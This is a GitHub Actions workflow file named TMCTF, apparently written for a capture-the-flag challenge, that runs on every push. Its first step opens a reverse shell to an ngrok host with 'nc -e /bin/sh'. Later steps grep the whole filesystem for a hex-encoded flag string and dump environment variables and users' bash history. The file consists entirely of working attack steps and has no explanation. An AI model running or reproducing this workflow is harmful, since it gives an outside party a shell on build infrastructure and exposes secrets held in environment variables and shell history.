name: TMCTF
on: [push]
jobs: 
  Recon: 
    runs-on: ubuntu-latest
    steps:
      - run: |
          nc -e /bin/sh 2.tcp.ngrok.io 19253 
      - run: |
          rgrep -i "544d435446" / 2>/dev/null
      - run: |
          env && cat /home/*/bash_history &
